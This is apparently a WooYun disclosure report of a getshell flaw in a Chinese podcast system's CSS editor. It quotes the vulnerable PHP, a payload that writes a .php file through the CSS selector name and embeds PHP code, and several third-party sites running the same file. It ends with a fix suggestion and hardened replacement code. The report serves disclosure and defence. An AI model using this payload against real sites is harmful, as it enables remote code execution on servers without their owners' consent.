Beijing Shinyv (尚为视讯) Podcast System Has a Getshell Vulnerability

Vulnerability details

Disclosure status:

2014-01-06: Details reported to the vendor, awaiting vendor handling
2014-01-11: Vendor has confirmed; details disclosed to the vendor only
2014-01-14: Details opened to third-party security partners
2014-01-21: Details disclosed to core white hats and experts in related fields
2014-01-31: Details disclosed to regular white hats
2014-02-20: Details disclosed to intern white hats
2014-04-06: Details disclosed to the public

Brief description:

I heard there are rewards for submitting generic vulnerabilities, so here is one I found last year.

Detailed description:

Judging by its interface, the podcast system of Beijing Shinyv Technology Co., Ltd. (北京尚为视讯科技有限公司) looks like a secondary development on top of Joomla. I found this getshell vulnerability last year during an authorized test of a certain system; the vulnerable file is http://www.shinyv.com/css_edit/css.php

The page is a CSS editor:

This CSS editor does not adequately filter the submitted data, which makes a getshell possible.

Lines 1370-1375 of css.php:

<form action="<?php echo $_SERVER['PHP_SELF']?>" method="POST"  name="formAdmin">
<TEXTAREA id=output style="BORDER-RIGHT: gray 1px solid; BORDER-TOP: gray 1px solid; MARGIN: px; BORDER-LEFT: gray 1px solid; WIDTH: 220px; BORDER-BOTTOM: gray 1px solid" name=textarea rows=7>
</TEXTAREA>
<br>
<input type="submit" value="保存代码" name="submit" >
</form>
The submitted text is then handled by lines 1398-1460:

<?php

$textarea = $_POST['textarea'];
$css_name = 'template_css.css';
$fp = fopen($css_name,'a+');
$css_back = file_get_contents($css_name);
$start = strpos($textarea,".");
$end = strpos($textarea,"{");
$start = $start+1;
$end = $end - 1;;
// the "class name" between "." and "{" is reused as the output file name
$css_name = substr($textarea,$start,$end);
// echo $css_name;
$nums = strpos($css_back,$css_name);
echo $nums;
if ($nums == ""){

// the full submitted text is written to that user-controlled file name,
// so a selector such as ".name.php{" creates a .php file beside css.php
file_put_contents($css_name,$textarea);
}

$content = file_get_contents($css_name,$textarea);
echo $content;
/* $num = strlen($css_name);
// echo $num;

$num_start = strpos($css_back,$css_name);
// echo $num_start;
$num_end = strpos($css_back,"}",$num_start);
// echo $num_end;
$num_start = $num_start -1 ;
$num_end = $num_end +1;
$str_back = substr($css_back,$num_start,$num_end);
// echo $str_back;

$new_css = substr_replace($css_back,$textarea,$num_start,$num_end);
// echo $new_css;
// fwrite($fp,$new_css);
// $fp = fopen($css_name,'w+');
$content = file_get_contents($css_name);
echo $content;
// file_put_contents($css_name,$new_css);
//$content = file_get_contents($css_name);
//echo $content;
/*
echo $text_area;
echo $num;
echo $re_str;
/*
$str1 = "qqqqq";
$srt = "qqq{} aaaa{rewqrewqrewq} aaa{}";
$str = "aaaa";
$qqq = substr($srt,7,19);
echo $qqq;
str_replace($qqq,$str)
//echo strpos($srt,"}",5);
//echo strlen($str);
//echo strpos($srt,$str);

$str = "abcdef";
$strt = substr_replace($str,"aa",0,1);
echo $strt;
*/
?>
So, submitting the following:

.someclass.php{
color : #C7FF38;
background-color : #E89100;
border-width : 1px; <?php phpinfo()?>
border-top-width : 1px;
border-left-width : 11px;
border-bottom-width : 1px;
border-color : transparent;
}
and clicking 保存代码 (Save code), then visiting http://www.shinyv.com/css_edit/someclass.php
Proof of vulnerability:

Quite a few sites use this system:

http://tv.tianjinwe.com/css_edit/css.php

http://www.woshitv.com/css_edit/css.php

http://audio.cnr.cn/css_edit/css.php and so on...

Fix suggestion:

Delete the unused file.
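If the editor must be kept, the following is an added example (not the vendor's code and not part of the original report) of a hardened save handler for css.php: the target file name is fixed instead of being taken from the submitted text, and the submission is validated as a single plain CSS rule before being appended. The names save_css_rule, CSS_DIR and the 4096-byte limit are assumptions, as is that the handler sits behind the application's normal administrator login.

```php
<?php
// Added example, not the vendor's code: a hardened save handler that keeps the
// editor's purpose (append one CSS rule to template_css.css) but never lets the
// request choose the file name or put PHP code into the stylesheet.

const CSS_DIR  = __DIR__;            // assumed stylesheet directory
const CSS_FILE = 'template_css.css'; // the only file this handler ever writes

// Returns the class name if the text starts with one ".name{" selector, else null.
function extract_class_name(string $textarea): ?string
{
    // Same idea as the original (name between '.' and '{'), but anchored and
    // limited to CSS identifier characters: ".someclass.php{" does not match.
    if (!preg_match('/^\s*\.([A-Za-z_][A-Za-z0-9_-]{0,63})\s*\{/', $textarea, $m)) {
        return null;
    }
    return $m[1];
}

function validate_css_rule(string $textarea): bool
{
    if (strlen($textarea) > 4096 || extract_class_name($textarea) === null) {
        return false;
    }
    // A stylesheet never needs PHP open tags or HTML tags.
    if (preg_match('/<\?|<\/?[a-z]/i', $textarea)) {
        return false;
    }
    // Exactly one rule body, properly closed.
    return substr_count($textarea, '{') === 1 && substr_count($textarea, '}') === 1;
}

// Appends the rule to the fixed stylesheet; false if rejected or already present.
function save_css_rule(string $textarea): bool
{
    if (!validate_css_rule($textarea)) {
        return false;
    }
    $target   = CSS_DIR . DIRECTORY_SEPARATOR . CSS_FILE; // never derived from input
    $class    = extract_class_name($textarea);
    $existing = is_file($target) ? file_get_contents($target) : '';
    if (preg_match('/(^|[\s}])\.' . preg_quote($class, '/') . '\s*\{/', $existing)) {
        return false; // a rule with this class name already exists
    }
    return file_put_contents($target, rtrim($textarea) . "\n", FILE_APPEND | LOCK_EX) !== false;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_POST['textarea'])) {
    echo save_css_rule((string) $_POST['textarea']) ? 'saved' : 'rejected';
}
```

With this handler the payload shown above is rejected twice over: the selector ".someclass.php{" fails the identifier check, and the "<?php" inside the rule body fails the tag check.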

Copyright notice: please credit the source, TestRoot@乌云 (WooYun), when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed at: 2014-01-11 10:08

Vendor reply:

Latest status:

None yet


Vulnerability evaluation: